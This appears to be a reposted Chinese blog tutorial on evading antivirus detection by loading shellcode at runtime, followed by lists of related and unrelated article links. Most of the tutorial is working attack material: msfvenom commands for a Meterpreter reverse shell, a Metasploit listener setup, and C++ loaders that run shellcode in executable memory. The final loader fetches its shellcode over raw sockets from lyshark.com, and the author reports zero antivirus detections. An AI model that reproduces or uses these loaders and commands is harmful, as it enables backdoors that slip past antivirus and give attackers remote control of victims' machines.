动态加载 ShellCode绕过杀软
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。
虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。通过使用virscan云鉴定技术,可以衡量出Payload的是否免杀,但需要注意的是,只有动态检测或基于行为的检测,才能真正捕获到现实世界中的Payload。
首先我们使用 msfvenom 命令创建一个具有反向连接Shell的可执行文件,生成命令(Linux)如下:
[root@localhost ~]# msfvenom –p windows/meterpreter/reverse_tcp \
> lhost=192.168.1.30 lport=8888 \
> -f exe -o lyshark.exe
上方的代码就可以生成一个lyshark.exe的可执行文件,将此文件上传到VirusTotal,发现它会被大量反病毒引擎所查杀,这是正常的,因为它是一个常见的Payload,许多安全厂商都会针对Metasploit进行特征码的提取与查杀。
嵌入式 Shellcode
通过上方的方式生成后门文件是不可取的,因为大多数反病毒厂商都掌握了Metasploit可执行模板的签名,因此我们决定创建自己的可执行文件,然后手动实现 ShellCode的加载工作。我们再次使用 msfvenom 命令,但在这次只生成 ShellCode,而不是完整的可执行文件:
[root@localhost ~]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.1.30 LPORT=8888 -f c
上方代码会生成一个Payload有效载荷,这里我们需要记下来,然后将ShellCode复制到一个单独的C++源文件中,然后编译生成一个可执行文件。
#include <Windows.h>
#include <stdio.h>
using namespace std;
int main(int argc,char **argv){
char ShellCode[] = "\0x0x0x0x0x0x0x......"; // ShellCode 填充到这里。
void *exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, ShellCode, sizeof ShellCode);
((void(*)())exec)();
return 0;
}
生成成功后,我们将攻击主机运行一个监听事件,然后打开生成后的后门,然后发现能够成功上线。
[root@localhost ~]# msfconsole
msf5 >
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 8888
msf5 exploit(multi/handler) > exploit -j -z
但是这种方式也是会直接被检测到,原因是ShellCode已经被加入了特征,接下来我们将通过远程的方式加载ShellCode代码,让恶意代码与加载器分离。
远程加载 Shellcode
上方的扫描结果依然会报毒,原因就是ShellCode已经被捕捉了特征,这里我们将动态加载ShellCode。它不是使用已编写到二进制文件中的ShellCode编译可执行文件,而是在运行时动态获取ShellCode代码,并将其动态的加载到内存中执行,从而做到ShellCode与加载器的分离,减少误报的概率。
#include <Windows.h>
#include <iostream>
#include <string>
#include <cstring>
#include <winhttp.h>
#include <stdlib.h>
#pragma comment(lib,"winhttp.lib")
using namespace std;
LPSTR get_shellcode(){
return 0;
}
int main(int argc,char **argv){
LPSTR hex_instructions = get_shellcode();
const char* ShellCode = hex_instructions;
int shellcode_length = strlen(ShellCode);
unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
for (size_t count = 0; count < shellcode_length / 2; count++){
sscanf(ShellCode, "%2hhx", &value[count]);
ShellCode += 2;
}
void *exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, value, shellcode_length /2 );
((void(*)())exec)();
return 0;
}
上方代码中创建了一个名为get_shellcode()函数,用于从另一台主机远程下载前面示例中使用的ShellCode。该函数使用winhttp库中的各种方法,通过HTTP的方式检索ShellCode。此外,当从远程位置以ASCII格式加载ShellCode时,需要执行额外步骤,要将指令转换为准备执行的原始二进制格式,这里的get_shellcode()并没有填充完整。
本次杀毒,你会发现误报全部消失了,因为在可执行文件中并没有恶意的ShellCode,并且也没有添加任何的下载函数,但如果添加了下载函数,此种方法生成的后门依然会存在误报。
替代文件下载功能
尽管我们已经分离除了程序中的 ShellCode代码,但有些杀毒软件仍然会报毒。为了获得0命中率,我们要思考,在这一过程遗漏了什么 ?
我们需要重新思考,首先要确定代码的哪个部分导致了告警。从直觉上,怀疑是函数 VirtualAlloc 和 memcpy 导致反病毒引擎认为该文件是可疑的,因为这些函数通常被用于内存注入。但是很多程序都会在内存中分配空间,所以这种猜测本身就是不正确的,实际上HTTP请求调用的函数可以获得远程托管的ShellCode,从而导致可疑的结果。通常我们会使用的函数是:
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpCloseHandle
但是这些函数,很容易就被杀软盯上,但幸运的是,Windows 提供了许多不同的库,可用于下载数据,例如WinInet,WinHTTP和Windows套接字。通过切换到更加手动的基于套接字的实现 ,如果使用这些第三方库或使用系统自带的下载命令,则任何防病毒引擎都不再将下载代码标记为可疑。
void mParseUrl(char *mUrl, string &serverName, string &filepath, string &filename);
SOCKET connectToServer(char *szServerName, WORD portNum);
int getHeaderLength(char *content);
char *readUrl2(char *szUrl, long &bytesReturnedOut, char **headerOut);
然后将其与先前演示的shellcode加载过程相结合。
#include <windows.h>
#include <string>
#include <stdio.h>
#include <iostream>
#include <cstring>
using std::string;
#pragma comment(lib,"ws2_32.lib")
HINSTANCE hInst;
WSADATA wsaData;
void mParseUrl(char *mUrl, string &serverName, string &filepath, string &filename);
SOCKET connectToServer(char *szServerName, WORD portNum);
int getHeaderLength(char *content);
char *readUrl2(char *szUrl, long &bytesReturnedOut, char **headerOut);
int main(){
const int bufLen = 1024;
char *szUrl = "lyshark.com/shellcode";
long fileSize;
char *memBuffer, *headerBuffer;
FILE *fp;
memBuffer = headerBuffer = NULL;
if (WSAStartup(0x101, &wsaData) != 0){
return -1;
}
memBuffer = readUrl2(szUrl, fileSize, &headerBuffer);
if (fileSize != 0)
{
fp = fopen("down.file", "wb");
fwrite(memBuffer, 1, fileSize, fp);
fclose(fp);
delete(headerBuffer);
}
int code_length = strlen(memBuffer);
unsigned char* value = (unsigned char*)calloc(code_length / 2, sizeof(unsigned char));
for (size_t count=0; count < code_length / 2; count++){
sscanf(memBuffer, "%2hhx", &value[count]);
memBuffer += 2;
}
void *exec = VirtualAlloc(0, code_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, value, code_length / 2);
((void(*)())exec)();
WSACleanup();
return 0;
}
最终的有效负载成功地向侦听主机发送了反向shell,更重要的是,VirScan上的检测率为零,本文所采取的步骤,展示了如何通过一些简单的修改,来使Payload绕过杀软的查杀。然而,我们还可以选择许多其他选项,包括:
- 在已知合法的二进制文件中插入Payload(https://github.com/secretsquirrel/the-backdoor-factory)。
- 使用Veil(https://github.com/Veil-Framework/Veil)进行Payload的编码和加密。
- 使用其他语言,例如:PowerShell、Python、Ruby、C#、Java、Go等。
参考文献:https://countercept.com/blog/dynamic-shellcode-execution
动态加载 ShellCode绕过杀软的更多相关文章
- 反射01 Class类的使用、动态加载类、类类型说明、获取类的信息
0 Java反射机制 反射(Reflection)是 Java 的高级特性之一,是框架实现的基础. 0.1 定义 Java 反射机制是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法:对 ...
- Python内存加载shellcode
生成 首先生成一个测试的msf shellcode msfvenom -p windows/x64/exec CMD=calc.exe -f python 把其中的shellcode复制出来留待待会使 ...
- 动态加载dll的实现+远线程注入
1.在目标进程中申请内存 2.向目标进程内存中写入shellcode(没有特征,编码比较麻烦) 3.创建远线程执行shellcode 之前可以看到shellcode很难编写还要去依赖库,去字符串区等等 ...
- js动态加载css和js
之前写了一个工具类点此链接里面含有这段代码,感觉用处挺多,特意提出来 var loadUtil = { /* * 方法说明:[动态加载js文件css文件] * 使用方法:loadUtil.loadjs ...
- geotrellis使用(二十三)动态加载时间序列数据
目录 前言 实现方法 总结 一.前言 今天要介绍的绝对是华丽的干货.比如我们从互联网上下载到了一系列(每天或者月平均等)的MODIS数据,我们怎么能够对比同一区域不同时间的数据情况,采用 ...
- Ext JS 如何动态加载JavaScript创建窗体
JavaScript不需要编译即可运行,这让JavaScript构建的应用程序可以变得很灵活.我们可以根据需要动态从服务器加载JavaScript脚本来创建和控制UI来与用户交互.下面结合Ext JS ...
- Ext动态加载Toolbar
在使用Ext的GridPanel时候,有时候需要面板不用重新加载而去更新Store或者Toolbar,Store的方法有很多,例如官方api给我们提供的Store.load(),Store.reLoa ...
- Android动态加载框架汇总
几种动态加载的比较 1.Tinker 用途:热修复 GitHub地址:https://github.com/Tencent/tinker/ 使用:http://www.jianshu.com/p/f6 ...
- 为不同分辨率单独做样式文件,在页面头部用js判断分辨率后动态加载定义好的样式文件
为不同分辨率单独做样式文件,在页面头部用js判断分辨率后动态加载定义好的样式文件.样式文件命名格式如:forms[_屏幕宽度].css,样式文件中只需重新定义文本框和下拉框的宽度即可. 在包含的头文件 ...
随机推荐
- 【剑指offer】面试题 6. 从尾到头打印链表
面试题 6. 从尾到头打印链表 NowCoder 题目描述 输入一个链表的头结点,从尾到头反过来打印出每个结点的值. Java 实现 ListNode Class class ListNode { i ...
- 卸载桌面产品,弹出错误框The Windows Installer service could not be accessed
卸载程序报这个错误: https://helpdeskgeek.com/how-to/how-to-fix-the-windows-installer-service-could-not-be-acc ...
- 转发:for /f命令之—Delims和Tokens用法&总结
在For命令语踞饽参数F中,最难理解的就是Delims和Tokens两个选项,本文简单的做一个比较和总拮.“For /f”常用来解析文本,读取字符串.分工上,delims负责切分字符串,而tokens ...
- Oracle 11g 总结篇2
第一部分: 字段名的别名用""括起来,如:last_name as "姓名". 去除重复:在投影的字段名前加上 distinct 就可以了. 比如:select ...
- SAS学习笔记58 单元格格式化设计
单元格行_row_ 对于行单元格,主要就通过_row_这么一个自动变量的方式,来对单元格所有行进行格式化设计 例如,对性别为“男”的单元格所在行颜色设定为红色: 单元格列_col_ 将_row_改成_ ...
- appium实例1:启动淘宝app
1.在android-sdk里面双击SDK-manager,下载buidl-tools 2.勾选build-tools,随便选一个版本,我这里选的是24的版本 3.下载完成后,在D:\androi ...
- AGC028E High Elements 贪心、DP、线段树
传送门 看到要求"字典序最小"的方案,一个很直观的想法是按位贪心,那么我们需要check的就是当某一个数放在了第一个序列之后是否还存在方案. 假设当前两个序列的最大值和前缀最值数量 ...
- 测试不得不知的python编程小技能-----升级版基础语法和优秀的编码习惯
编程和学习python,最后快速上手.能写小工具,写自动化用例这类要求对鹅厂的测试人员来说都是一些基础的必备素质,但是一个优秀的测试,也是有着一颗开发完美测试工具的心的.但是罗马不是一天构建成,特别是 ...
- springboot 2.1.3.RELEASE添加filter,servlet源码学习
Servlet规范中,通过ServeltContext来注册Filter.Servlet,这里分析Filter,Servlet是相同逻辑 springboot2.0中,我们通过 FilterRegis ...
- PDA日常问题
一.连接网络异常 1.摩托摩拉3190连接wifi时报错,提示:scan error adapter unavailable 确认网卡是不是禁用状态,CE是右下角有个蓝色的图,上面有个X,点一下,然后 ...